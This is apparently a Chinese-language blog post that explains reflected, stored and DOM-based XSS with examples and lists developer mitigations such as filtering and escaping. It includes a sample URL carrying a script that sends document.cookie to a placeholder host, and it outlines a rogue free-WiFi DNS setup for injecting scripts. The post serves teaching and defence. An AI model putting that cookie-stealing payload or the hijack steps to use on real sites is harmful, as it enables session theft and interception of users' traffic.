背景
前阵子想了解一些关于XSS攻击的知识,于是在网上翻阅了一些有关XSS的概念,于是我总结了下来,今天清理电脑的时候发现这篇文章,故提交之。
XSS - Cross-site scripting
- Reflected XSS(基于反射的XSS攻击)
- Stored XSS(基于存储的XSS攻击)
- DOM-based or local XSS(基于DOM或本地的XSS攻击)
Reflected XSS
主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击
例子:
- 在搜索框搜索内容或者URL直接写入脚本,
<script>alert('handsome boy')</script>
, 点击搜索或者回车。 - 当前端页面没有对返回的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。
- 进而可以构造获取用户cookies的地址,通过QQ群或者垃圾邮件,来让其他人点击这个地址:
http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
PS:这个地址当然是没效的,只是举例子而已。
结论: 如果第3步能做成功,才是个像样的XSS攻击。
开发安全措施:
- 前端在显示服务端数据时候,不仅是标签内容需要过滤、转义,就连属性值也都可能需要。
- 后端接收请求时,验证请求是否为攻击请求,攻击则屏蔽
Stored XSS
基于存储的XSS攻击,是通过发表带有恶意跨域脚本的帖子/文章,从而把恶意脚本存储在服务器,每个访问该帖子/文章的人就会触发执行
例子:
- 发一篇文章,里面包含了恶意脚本
今天天气不错啊!
<script>alert('handsome boy')</script>
- 后端没有对文章进行过滤,直接保存文章内容到数据库。
- 当其他看这篇文章的时候,包含的恶意脚本就会执行。
因为大部分文章是保存整个HTML内容的,前端显示时候也不做过滤,就极可能出现这种情况。
结论: 后端尽可能对提交数据做过滤,在场景需求而不过滤的情况下,前端就需要做些处理了。
开发安全措施:
- 首要是服务端要进行过滤,因为前端的校验可以被绕过。
- 当服务端不校验时候,前端要以各种方式过滤里面可能的恶意脚本,例如script标签,将特殊字符转换成HTML编码。
DOM-based or local XSS
基于DOM或本地的XSS攻击。 一般是提供一个免费的wifi,但是提供免费wifi的网关会往你访问的任何页面插入一段脚本或者是直接返回一个钓鱼页面,从而植入恶意脚本。这种直接存在于页面,无须经过服务器返回就是基于本地的XSS攻击。
例子:
- 提供一个免费的wifi。
- 开启一个特殊的DNS服务,将所有域名都解析到我们的电脑上,并把Wifi的DHCP-DNS设置为我们的电脑IP。
- 之后连上wifi的用户打开任何网站,请求都将被我们截取到。我们根据http头中的host字段来转发到真正服务器上。
- 收到服务器返回的数据之后,我们就可以实现网页脚本的注入,并返回给用户。
- 当注入的脚本被执行,用户的浏览器将依次预加载各大网站的常用脚本库。
这个其实就是wifi流量劫持,中间人可以看到用户的每一个请求,可以在页面嵌入恶意代码,使用恶意代码获取用户的信息,可以返回钓鱼页面。
https://www.cnblogs.com/index-html/p/wifi_hijack_3.html